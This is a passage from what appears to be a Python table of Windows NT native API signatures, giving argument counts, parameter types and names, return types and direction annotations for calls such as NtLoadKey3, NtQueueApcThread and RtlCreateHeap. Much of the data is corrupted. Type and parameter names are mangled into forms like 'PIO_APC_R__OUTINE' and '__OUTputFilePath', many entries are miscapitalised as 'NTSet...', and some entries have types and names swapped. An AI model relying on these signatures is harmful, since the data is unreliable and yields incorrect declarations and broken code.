\"POBJECT_ATTRIBUTES\", \"ULONG\", \"HANDLE\", \"PVOID\", \"PVOID\", \"PVOID\", \"PIO_STATUS_BLOCK\"], [\"TargetKey\", \"SourceFile\", \"Flags\", \"TrustClassKey\", \"Reserved\", \"ObjectContext\", \"CallbackReserved\", \"IoStatusBlock\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN\", \"__IN\", \"__IN\", \"__OUT\"]), \"NtLockProductActivationKeys\": (2, [\"PULONG\", \"PULONG\"], [\"ProductBuild\", \"SafeMode\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtLockRegistryKey\": (1, [\"HANDLE\"], [\"KeyHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtMakePermanentObject\": (1, [\"HANDLE\"], [\"Object\"], \"NTSTATUS\", [\"__IN\"]), \"NtManageHotPatch\": (4, [\"ULONG\", \"PULONGLONG\", \"ULONG\", \"PVOID\"], [\"Unknown\", \"Unknown\", \"Unknown\", \"Unknown\"], \"NTSTATUS\", [None, None, None, None]), \"NtMapCMFModule\": (6, [\"ULONG\", \"ULONG\", \"__opt\", \"__opt\", \"__opt\", \"__opt\"], [\"What\", \"Index\", \"PULONG\", \"PULONG\", \"PULONG\", \"PPVOID\"], \"NTSTATUS\", [\"__IN\", \"__IN\", None, None, None, None]), \"NtModifyBootEntry\": (1, [\"PBOOT_ENTRY\"], [\"BootEntry\"], \"NTSTATUS\", [\"__IN\"]), \"NtModifyDriverEntry\": (1, [\"PDRIVER_ENTRY\"], [\"DriverEntry\"], \"NTSTATUS\", [\"__IN\"]), \"NtNotifyChangeDirectoryFileEx\": (10, [\"HANDLE\", \"HANDLE\", \"PIO_APC_R__OUTINE\", \"PVOID\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\", \"ULONG\", \"BOOLEAN\", \"DIRECTORY_NOTIFY__INFORMATION_CLASS\"], [\"FileHandle\", \"Event\", \"ApcR__OUTine\", \"ApcContext\", \"IoStatusBlock\", \"Buffer\", \"Length\", \"CompletionFilter\", \"WatchTree\", \"DirectoryNotifyInformationClass\"], \"NTSTATUS\", [\"__IN_\", \"__IN_opt_\", \"__IN_opt_\", \"__IN_opt_\", None, None, \"__IN_\", \"__IN_\", \"__IN_\", \"__IN_opt_\"]), \"NtNotifyChangeMultipleKeys\": (12, [\"HANDLE\", \"ULONG\", \"POBJECT_ATTRIBUTES\", \"HANDLE\", \"PIO_APC_R__OUTINE\", \"PVOID\", \"PIO_STATUS_BLOCK\", \"ULONG\", \"BOOLEAN\", \"__opt\", \"ULONG\", \"BOOLEAN\"], [\"MasterKeyHandle\", \"Count\", \"SubordinateObjects\", \"Event\", \"ApcR__OUTine\", \"ApcContext\", \"IoStatusBlock\", \"CompletionFilter\", \"WatchTree\", \"PVOID\", \"BufferSize\", \"Asynchronous\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__OUT\", \"__IN\", \"__IN\", None, \"__IN\", \"__IN\"]), \"NtOpenKeyEx\": (4, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"ULONG\"], [\"KeyHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"OpenOptions\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN\"]), \"NtOpenKeyedEvent\": (3, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\"], [\"KeyedEventHandle\", \"DesiredAccess\", \"ObjectAttributes\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\"]), \"NtOpenRegistryTransaction\": (3, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\"], [\"RegistryHandle\", \"DesiredAccess\", \"ObjectAttributes\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\"]), \"NtPlugPlayControl\": (3, [\"ULONG\", \"PVOID\", \"ULONG\"], [\"Class\", \"Buffer\", \"BufferSize\"], \"NTSTATUS\", [\"__IN\", \"__IN_OUT\", \"__IN\"]), \"NtPssCaptureVaSpaceBulk\": (5, [\"HANDLE\", \"PVOID\", \"PVOID\", \"SIZE_T\", \"PSIZE_T\"], [\"ProcessHandle\", \"BaseAddress\", \"Buffer\", \"Length\", \"ReturnLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__OUT\"]), \"NtQueryAuxiliaryCounterFrequency\": (1, [\"PULONGLONG\"], [\"lpAuxiliaryCounterFrequency\"], \"NTSTATUS\", [\"__OUT\"]), \"NtQueryDebugFilterState\": (2, [\"ULONG\", \"ULONG\"], [\"Component\", \"Level\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtQueryInformationByName\": (5, [\"POBJECT_ATTRIBUTES\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\", \"FILE__INFORMATION_CLASS\"], [\"ObjectAttributes\", \"IoStatusBlock\", \"FileInformation\", \"Length\", \"FileInformationClass\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__OUT\", \"__IN\", \"__IN\"]), \"NtQueryInstallUILanguage\": (1, [\"PULONG\"], [\"LanguageId\"], \"NTSTATUS\", [\"__OUT\"]), \"NtQueryLicenseValue\": (5, [\"PUNICODE_STRING\", \"PULONG\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"Name\", \"Type\", \"Buffer\", \"Length\", \"ReturnedLength\"], \"NTSTATUS\", [\"__IN\", \"__OUT_opt\", \"__OUT\", \"__IN\", \"__OUT\"]), \"NtQueryOpenSubKeys\": (2, [\"POBJECT_ATTRIBUTES\", \"PULONG\"], [\"TargetKey\", \"HandleCount\"], \"NTSTATUS\", [\"__IN\", \"__OUT\"]), \"NtQueryOpenSubKeysEx\": (4, [\"POBJECT_ATTRIBUTES\", \"ULONG\", \"PVOID\", \"PULONG\"], [\"TargetKey\", \"BufferLength\", \"Buffer\", \"ResultLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__OUT\"]), \"NtQueryPortInformationProcess\": (0, [], [], \"NTSTATUS\", []), \"NtQuerySecurityPolicy\": (6, [\"PUNICODE_STRING\", \"PUNICODE_STRING\", \"PUNICODE_STRING\", \"PULONG\", \"PBOOLEAN\", \"PULONG\"], [\"Category\", \"SubCategory\", \"Policy\", \"Unknown\", \"Enabled\", \"Subsystem\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN_OUT\", \"__OUT\", \"__IN\"]), \"NtQueryWnfStateNameInformation\": (5, [\"PCWNF_STATE_NAME\", \"ULONG\", \"PVOID\", \"PVOID\", \"ULONG\"], [\"StateName\", \"NameInfoClass\", \"ExplicitScope\", \"InfoBuffer\", \"InfoBufferSize\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN_opt\", \"__OUT\", \"__IN\"]), \"NtRenameKey\": (2, [\"HANDLE\", \"PUNICODE_STRING\"], [\"KeyHandle\", \"ReplacementName\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtResumeProcess\": (1, [\"HANDLE\"], [\"hProcess\"], \"NTSTATUS\", [\"__IN\"]), \"NtRevertContainerImpersonation\": (0, [], [], \"NTSTATUS\", []), \"NtRollbackRegistryTransaction\": (2, [\"HANDLE\", \"BOOL\"], [\"RegistryHandle\", \"Wait\"], \"NTSTATUS\", [None, None]), \"NTSaveKeyEx\": (3, [\"HANDLE\", \"HANDLE\", \"ULONG\"], [\"KeyHandle\", \"FileHandle\", \"Flags\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\"]), \"NTSaveMergedKeys\": (3, [\"HANDLE\", \"HANDLE\", \"HANDLE\"], [\"HighPrecedenceKeyHandle\", \"LowPrecedenceKeyHandle\", \"FileHandle\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\"]), \"NTSecureConnectPort\": (9, [\"PHANDLE\", \"PUNICODE_STRING\", \"ULONG\", \"PPORT_VIEW\", \"PSID\", \"PREMOTE_PORT_VIEW\", \"PULONG\", \"PVOID\", \"PULONG\"], [\"PortHandle\", \"Name\", \"QOS\", \"pSectionInfo\", \"SecurityInfo\", \"pSectionMapInfo\", \"MaxMsgLength\", \"ConnectData\", \"ConnectDataLength\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN_OUT\", \"__IN\", \"__IN_OUT\", \"__OUT\", \"__IN_OUT_opt\", \"__IN_OUT_opt\"]), \"NTSetBootOptions\": (2, [\"PVOID\", \"ULONG\"], [\"Buffer\", \"BufferLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NTSetCachedSigningLevel\": (5, [\"ULONG\", \"BYTE\", \"PHANDLE\", \"ULONG\", \"HANDLE\"], [\"Flags\", \"InputSigningLevel\", \"SourceFiles\", \"SourceFileCount\", \"TargetFile\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\"]), \"NTSetCachedSigningLevel2\": (6, [\"ULONG\", \"BYTE\", \"PHANDLE\", \"ULONG\", \"HANDLE\", \"PVOID\"], [\"Flags\", \"InputSigningLevel\", \"SourceFiles\", \"SourceFileCount\", \"TargetFile\", \"LevelInformation\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN_opt\"]), \"NTSetContextThread\": (2, [\"HANDLE\", \"PCONTEXT\"], [\"ThreadHandle\", \"pContext\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NTSetDebugFilterState\": (3, [\"ULONG\", \"ULONG\", \"BOOLEAN\"], [\"Component\", \"Level\", \"State\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\"]), \"NTSetDefaultUILanguage\": (1, [\"ULONG\"], [\"LanguageId\"], \"NTSTATUS\", [\"__IN\"]), \"NTSetIRTimer\": (2, [\"HANDLE\", \"PLARGE_INTEGER\"], [\"TimerHandle\", \"Time\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\"]), \"NTSetInformationDebugObject\": (5, [\"HANDLE\", \"DEBUGOBJECTINFOCLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"DebugHandle\", \"Class\", \"Buffer\", \"Length\", \"ReturnLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__OUT_opt\"]), \"NTSetInformationSymbolicLink\": (4, [\"HANDLE\", \"ULONG\", \"PVOID\", \"ULONG\"], [\"Handle\", \"Class\", \"Buffer\", \"BufferLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NTSetLdtEntries\": (6, [\"ULONG\", \"ULONG\", \"ULONG\", \"ULONG\", \"ULONG\", \"ULONG\"], [\"Selector1\", \"LdtEntry1L\", \"LdtEntry1H\", \"Selector2\", \"LdtEntry2L\", \"LdtEntry2H\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NTSetSystemEnvironmentValueEx\": (5, [\"PUNICODE_STRING\", \"PVOID\", \"PVOID\", \"ULONG\", \"ULONG\"], [\"Name\", \"Guid\", \"Buffer\", \"BufferLength\", \"Attributes\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NTSetSystemPowerState\": (3, [\"POWER_ACTION\", \"SYSTEM_POWER_STATE\", \"ULONG\"], [\"Action\", \"State\", \"Flags\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\"]), \"NTSetThreadExecutionState\": (2, [\"ULONG\", \"PULONG\"], [\"State\", \"PreviousState\"], \"NTSTATUS\", [\"__IN\", \"__OUT\"]), \"NTSetUuidSeed\": (1, [\"PUCHAR\"], [\"UuidSeed\"], \"NTSTATUS\", [\"__IN\"]), \"NTSubscribeWnfStateChange\": (4, [\"PCWNF_STATE_NAME\", \"ULONG\", \"ULONG\", \"__opt\"], [\"StateName\", \"ChangeStamp\", \"EventMask\", \"PULONG\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN\", None]), \"NTSuspendProcess\": (1, [\"HANDLE\"], [\"ProcessHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtTranslateFilePath\": (4, [\"PVOID\", \"ULONG\", \"PVOID\", \"ULONG\"], [\"InputPath\", \"__OUTputType\", \"__OUTputFilePath\", \"__OUTputFilePathLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__IN\"]), \"NtUnloadKey2\": (2, [\"POBJECT_ATTRIBUTES\", \"ULONG\"], [\"TargetKey\", \"Flags\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtUnloadKeyEx\": (2, [\"POBJECT_ATTRIBUTES\", \"HANDLE\"], [\"TargetKey\", \"Event\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtUnsubscribeWnfStateChange\": (1, [\"PCWNF_STATE_NAME\"], [\"StateName\"], \"NTSTATUS\", [\"__IN\"]), \"NtVdmControl\": (2, [\"ULONG\", \"PVOID\"], [\"ControlCode\", \"ControlData\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtWaitForAlertByThreadId\": (2, [\"HANDLE\", \"PLARGE_INTEGER\"], [\"Handle\", \"Time_Out\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\"]), \"NtWaitForDebugEvent\": (4, [\"HANDLE\", \"BOOLEAN\", \"PLARGE_INTEGER\", \"PULONG\"], [\"DebugHandle\", \"Alertable\", \"Time_Out\", \"Result\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN_opt\", \"__OUT\"]), \"NtLoadKey3\": (8, [\"POBJECT_ATTRIBUTES\", \"POBJECT_ATTRIBUTES\", \"ULONG\", \"PVOID\", \"ULONG\", \"ACCESS_MASK\", \"HANDLE\", \"ULONG\"], [\"KeyObjectAttributes\", \"FileObjectAttributes\", \"Flags\", \"LoadArguments\", \"LoadArgumentCount\", \"DesiredAccess\", \"KeyHandle\", \"Unkown\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NtAlpcConnectPort\": (11, [\"PHANDLE\", \"PUNICODE_STRING\", \"POBJECT_ATTRIBUTES\", \"PALPC_PORT_ATTRIBUTES\", \"ULONG\", \"PSID\", \"PPORT_MESSAGE\", \"PULONG\", \"PALPC_MESSAGE_ATTRIBUTES\", \"PALPC_MESSAGE_ATTRIBUTES\", \"PLARGE_INTEGER\"], [\"PortHandle\", \"PortName\", \"ObjectAttributes\", \"PortAttributes\", \"Flags\", \"RequiredServerSid\", \"ConnectionMessage\", \"BufferLength\", \"__OUTMessageAttributes\", \"__INMessageAttributes\", \"Time_Out\"], \"NTSTATUS\", [None, \"__IN_\", \"__IN_opt_\", \"__IN_opt_\", \"__IN_\", \"__IN_opt_\", None, \"__IN_OUT_opt_\", \"__IN_OUT_opt_\", \"__IN_OUT_opt_\", \"__IN_opt_\"]), \"NtCancelDeviceWakeupRequest\": (1, [\"HANDLE\"], [\"Device\"], \"NTSTATUS\", [\"__IN_\"]), \"NtCreateChannel\": (2, [\"PHANDLE\", \"POBJECT_ATTRIBUTES\"], [\"ChannelHandle\", \"ObjectAttributes\"], \"NTSTATUS\", [\"__OUT\", \"__IN_opt\"]), \"NtFreeUserPhysicalPages\": (3, [\"HANDLE\", \"PULONG\", \"PULONG\"], [\"ProcessHandle\", \"NumberOfPages\", \"UserPfnArray\"], \"NTSTATUS\", [\"__IN\", \"__IN_OUT\", \"__IN_OUT\"]), \"NtGetPlugPlayEvent\": (4, [\"PPLUGPLAY_APC_R__OUTINE\", \"PVOID\", \"PPLUGPLAY_EVENT_BLOCK\", \"ULONG\"], [\"PnPApcR__OUTine\", \"PnPContext\", \"PnPEvent\", \"EventBufferLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__IN\"]), \"NtOpenChannel\": (2, [\"PHANDLE\", \"POBJECT_ATTRIBUTES\"], [\"ChannelHandle\", \"ObjectAttributes\"], \"NTSTATUS\", [\"__OUT\", \"__IN\"]), \"NtReplyWaitSendChannel\": (3, [\"PVOID\", \"ULONG\", \"PCHANNEL_MESSAGE\"], [\"Text\", \"Length\", \"*Message\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\"]), \"NTSendWaitReplyChannel\": (4, [\"HANDLE\", \"PVOID\", \"ULONG\", \"PCHANNEL_MESSAGE\"], [\"ChannelHandle\", \"Text\", \"Length\", \"*Message\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__OUT\"]), \"NTSetContextChannel\": (1, [\"PVOID\"], [\"Context\"], \"NTSTATUS\", [\"__IN\"]), \"NtRequestDeviceWakeup\": (1, [\"HANDLE\"], [\"Device\"], \"NTSTATUS\", [\"__IN\"]), \"NtRequestWakeupLatency\": (1, [\"LATENCY_TIME\"], [\"latency\"], \"NTSTATUS\", [\"__IN\"]), \"NtW32Call\": (5, [\"ULONG\", \"PVOID\", \"ULONG\", \"PVOID\", \"PULONG\"], [\"ApiNumber\", \"InputBuffer\", \"InputLength\", \"*__OUTputBuffer\", \"__OUTputLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__OUT\", \"__OUT\"]), \"KiUserApcDispatcher\": (5, [\"PVOID\", \"PVOID\", \"PVOID\", \"PVOID\", \"PVOID\"], [\"Unused1\", \"Unused2\", \"Unused3\", \"ContextStart\", \"ContextBody\"], \"VOID\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NtAlertThread\": (1, [\"HANDLE\"], [\"ThreadHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtCallbackReturn\": (3, [\"PVOID\", \"ULONG\", \"NTSTATUS\"], [\"Result\", \"ResultLength\", \"Status\"], \"NTSTATUS\", [\"__IN_opt\", \"__IN\", \"__IN\"]), \"NtQueueApcThread\": (5, [\"HANDLE\", \"PIO_APC_ROUTINE\", \"PVOID\", \"PIO_STATUS_BLOCK\", \"ULONG\"], [\"ThreadHandle\", \"ApcRoutine\", \"ApcRoutineContext\", \"ApcStatusBlock\", \"ApcReserved\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\"]), \"NtTestAlert\": (0, [], [], \"NTSTATUS\", []), \"NtAddAtom\": (2, [\"PWCHAR\", \"PRTL_ATOM\"], [\"AtomName\", \"Atom\"], \"NTSTATUS\", [\"__IN\", \"__OUT\"]), \"NtDeleteAtom\": (1, [\"RTL_ATOM\"], [\"Atom\"], \"NTSTATUS\", [\"__IN\"]), \"NtFindAtom\": (2, [\"PWCHAR\", \"PRTL_ATOM\"], [\"AtomName\", \"Atom\"], \"NTSTATUS\", [\"__IN\", \"__OUT_opt\"]), \"NtQueryInformationAtom\": (5, [\"RTL_ATOM\", \"ATOM_INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"Atom\", \"AtomInformationClass\", \"AtomInformation\", \"AtomInformationLength\", \"ReturnLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT_opt\"]), \"RtlCompressBuffer\": (8, [\"ULONG\", \"PVOID\", \"ULONG\", \"PVOID\", \"ULONG\", \"ULONG\", \"PULONG\", \"PVOID\"], [\"CompressionFormat\", \"SourceBuffer\", \"SourceBufferLength\", \"DestinationBuffer\", \"DestinationBufferLength\", \"Unknown\", \"pDestinationSize\", \"WorkspaceBuffer\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__IN\", \"__OUT\", \"__IN\"]), \"RtlDecompressBuffer\": (6, [\"ULONG\", \"PVOID\", \"ULONG\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"CompressionFormat\", \"DestinationBuffer\", \"DestinationBufferLength\", \"SourceBuffer\", \"SourceBufferLength\", \"pDestinationSize\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__OUT\"]), \"RtlGetCompressionWorkSpaceSize\": (3, [\"ULONG\", \"PULONG\", \"PULONG\"], [\"CompressionFormat\", \"pNeededBufferSize\", \"pUnknown\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__OUT\"]), \"DbgPrint\": (1, [\"LPCSTR\"], [\"Format\"], \"NTSTATUS\", [\"__IN\"]), \"NTSystemDebugControl\": (6, [\"SYSDBG_COMMAND\", \"PVOID\", \"ULONG\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"Command\", \"InputBuffer\", \"InputBufferLength\", \"OutputBuffer\", \"OutputBufferLength\", \"ReturnLength\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN\", \"__OUT_opt\", \"__IN\", \"__OUT_opt\"]), \"RtlCaptureStackBackTrace\": (4, [\"ULONG\", \"ULONG\", \"PVOID\", \"PULONG\"], [\"FramesToSkip\", \"FramesToCapture\", \"*BackTrace\", \"BackTraceHash\"], \"USHORT\", [\"__IN\", \"__IN\", \"__OUT\", \"__OUT\"]), \"RtlGetCallersAddress\": (2, [\"PVOID\", \"PVOID\"], [\"*CallersAddress\", \"*CallersCaller\"], \"PVOID\", [\"__OUT\", \"__OUT\"]), \"NtDisplayString\": (1, [\"PUNICODE_STRING\"], [\"String\"], \"NTSTATUS\", [\"__IN\"]), \"NtRaiseException\": (3, [\"PEXCEPTION_RECORD\", \"PCONTEXT\", \"BOOLEAN\"], [\"ExceptionRecord\", \"ThreadContext\", \"HandleException\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\"]), \"NtRaiseHardError\": (6, [\"NTSTATUS\", \"ULONG\", \"PUNICODE_STRING\", \"PVOID\", \"HARDERROR_RESPONSE_OPTION\", \"PHARDERROR_RESPONSE\"], [\"ErrorStatus\", \"NumberOfParameters\", \"UnicodeStringParameterMask\", \"*Parameters\", \"ResponseOption\", \"Response\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN_opt\", \"__IN\", \"__IN\", \"__OUT\"]), \"NTSetDefaultHardErrorPort\": (1, [\"HANDLE\"], [\"PortHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtQuerySystemEnvironmentValue\": (4, [\"PUNICODE_STRING\", \"PWCHAR\", \"ULONG\", \"PULONG\"], [\"VariableName\", \"Value\", \"ValueBufferLength\", \"RequiredLength\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__IN\", \"__OUT_opt\"]), \"NTSetSystemEnvironmentValue\": (2, [\"PUNICODE_STRING\", \"PUNICODE_STRING\"], [\"VariableName\", \"Value\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"RtlCreateEnvironment\": (2, [\"BOOLEAN\", \"PVOID\"], [\"Inherit\", \"*Environment\"], \"NTSTATUS\", [\"__IN\", \"__OUT\"]), \"RtlDestroyEnvironment\": (1, [\"PVOID\"], [\"Environment\"], \"VOID\", [\"__IN\"]), \"RtlExpandEnvironmentStrings_U\": (4, [\"PVOID\", \"PUNICODE_STRING\", \"PUNICODE_STRING\", \"PULONG\"], [\"Environment\", \"SourceString\", \"DestinationString\", \"DestinationBufferLength\"], \"NTSTATUS\", [\"__IN_opt\", \"__IN\", \"__OUT\", \"__OUT_opt\"]), \"RtlQueryEnvironmentVariable_U\": (3, [\"PVOID\", \"PUNICODE_STRING\", \"PUNICODE_STRING\"], [\"Environment\", \"VariableName\", \"VariableValue\"], \"NTSTATUS\", [\"__IN_opt\", \"__IN\", \"__OUT\"]), \"RtlSetCurrentEnvironment\": (2, [\"PVOID\", \"PVOID\"], [\"NewEnvironment\", \"*OldEnvironment\"], \"VOID\", [\"__IN\", \"__OUT_opt\"]), \"RtlSetEnvironmentVariable\": (3, [\"PVOID\", \"PUNICODE_STRING\", \"PUNICODE_STRING\"], [\"*Environment\", \"VariableName\", \"VariableValue\"], \"NTSTATUS\", [\"__IN_OUT_opt\", \"__IN\", \"__IN\"]), \"LdrGetDllHandle\": (4, [\"PWORD\", \"PVOID\", \"PUNICODE_STRING\", \"PHANDLE\"], [\"pwPath\", \"Unused\", \"ModuleFileName\", \"pHModule\"], \"NTSTATUS\", [\"__IN_opt\", \"__IN_opt\", \"__IN\", \"__OUT\"]), \"LdrGetProcedureAddress\": (4, [\"HMODULE\", \"PANSI_STRING\", \"WORD\", \"PVOID\"], [\"ModuleHandle\", \"FunctionName\", \"Oridinal\", \"*FunctionAddress\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN_opt\", \"__OUT\"]), \"LdrLoadDll\": (4, [\"PWCHAR\", \"ULONG\", \"PUNICODE_STRING\", \"PHANDLE\"], [\"PathToFile\", \"Flags\", \"ModuleFileName\", \"ModuleHandle\"], \"NTSTATUS\", [\"__IN_opt\", \"__IN_opt\", \"__IN\", \"__OUT\"]), \"LdrQueryProcessModuleInformation\": (3, [\"PSYSTEM_MODULE_INFORMATION\", \"ULONG\", \"PULONG\"], [\"SystemModuleInformationBuffer\", \"BufferSize\", \"RequiredSize\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__OUT_opt\"]), \"LdrShutdownProcess\": (0, [], [], \"VOID\", []), \"LdrShutdownThread\": (0, [], [], \"VOID\", []), \"LdrUnloadDll\": (1, [\"HANDLE\"], [\"ModuleHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtLoadDriver\": (1, [\"PUNICODE_STRING\"], [\"DriverServiceName\"], \"NTSTATUS\", [\"__IN\"]), \"NtUnloadDriver\": (1, [\"PUNICODE_STRING\"], [\"DriverServiceName\"], \"NTSTATUS\", [\"__IN\"]), \"RtlImageNtHeader\": (1, [\"PVOID\"], [\"ModuleAddress\"], \"PIMAGE_NT_HEADERS\", [\"__IN\"]), \"RtlImageRvaToVa\": (4, [\"PIMAGE_NT_HEADERS\", \"PVOID\", \"ULONG\", \"PIMAGE_SECTION_HEADER\"], [\"NtHeaders\", \"ModuleBase\", \"Rva\", \"pLastSection\"], \"PVOID\", [\"__IN\", \"__IN\", \"__IN\", \"__IN_OUT_opt\"]), \"NtFlushWriteBuffer\": (0, [], [], \"NTSTATUS\", []), \"NTShutdownSystem\": (1, [\"SHUTDOWN_ACTION\"], [\"Action\"], \"NTSTATUS\", [\"__IN\"]), \"NtQueryDefaultLocale\": (2, [\"BOOLEAN\", \"PLCID\"], [\"UserProfile\", \"DefaultLocaleId\"], \"NTSTATUS\", [\"__IN\", \"__OUT\"]), \"NTSetDefaultLocale\": (2, [\"BOOLEAN\", \"LCID\"], [\"UserProfile\", \"DefaultLocaleId\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"RtlAllocateHeap\": (3, [\"PVOID\", \"ULONG\", \"ULONG\"], [\"HeapHandle\", \"Flags\", \"Size\"], \"PVOID\", [\"__IN\", \"__IN\", \"__IN\"]), \"RtlCompactHeap\": (2, [\"HANDLE\", \"ULONG\"], [\"HeapHandle\", \"Flags\"], \"ULONG\", [\"__IN\", \"__IN\"]), \"RtlCreateHeap\": (6, [\"ULONG\", \"PVOID\", \"ULONG\", \"ULONG\", \"BOOLEAN\", \"PRTL_HEAP_DEFINITION\"], [\"Flags\", \"Base\", \"Reserve\", \"Commit\", \"Lock\", \"RtlHeapParams\"], \"PVOID\", [\"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN\", \"__IN_opt\", \"__IN_opt\"]), \"RtlDestroyHeap\": (1, [\"PVOID\"], [\"HeapHandle\"], \"NTSTATUS\", [\"__IN\"]), \"RtlEnumProcessHeaps\": (2, [\"PHEAP_ENUMERATION_ROUTINE\", \"PVOID\"], [\"HeapEnumerationRoutine\", \"Param\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\"]), \"RtlFreeHeap\": (3, [\"PVOID\", \"ULONG\", \"PVOID\"], [\"HeapHandle\", \"Flags\", \"MemoryPointer\"], \"BOOLEAN\", [\"__IN\", \"__IN_opt\", \"__IN\"]), \"RtlGetProcessHeaps\": (2, [\"ULONG\", \"PVOID\"], [\"MaxNumberOfHeaps\", \"*HeapArray\"], \"ULONG\", [\"__IN\", \"__OUT\"]), \"RtlLockHeap\": (1, [\"PVOID\"], [\"HeapHandle\"], \"BOOLEAN\", [\"__IN\"]), \"RtlProtectHeap\": (2, [\"PVOID\", \"BOOLEAN\"], [\"HeapHandle\", \"Protect\"], \"PVOID\", [\"__IN\", \"__IN\"]), \"RtlReAllocateHeap\": (4, [\"PVOID\", \"ULONG\", \"PVOID\", \"ULONG\"], [\"HeapHandle\", \"Flags\", \"MemoryPointer\", \"Size\"], \"PVOID\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"RtlSizeHeap\": (3, [\"PVOID\", \"ULONG\", \"PVOID\"], [\"HeapHandle\", \"Flags\", \"MemoryPointer\"], \"ULONG\", [\"__IN\", \"__IN\", \"__IN\"]), \"RtlUnlockHeap\": (1, [\"PVOID\"], [\"HeapHandle\"], \"BOOLEAN\", [\"__IN\"]), \"RtlValidateHeap\": (3, [\"PVOID\", \"ULONG\", \"PVOID\"], [\"HeapHandle\", \"Flags\", \"AddressToValidate\"], \"BOOLEAN\", [\"__IN\", \"__IN\", \"__IN_opt\"]), \"RtlValidateProcessHeaps\": (0, [], [], \"BOOLEAN\", []), \"RtlWalkHeap\": (2, [\"PVOID\", \"LPPROCESS_HEAP_ENTRY\"], [\"HeapHandle\", \"ProcessHeapEntry\"], \"NTSTATUS\", [\"__IN\", \"__IN_OUT\"]), \"NtAllocateVirtualMemory\": (6, [\"HANDLE\", \"PVOID\", \"ULONG\", \"PULONG\", \"ULONG\", \"ULONG\"], 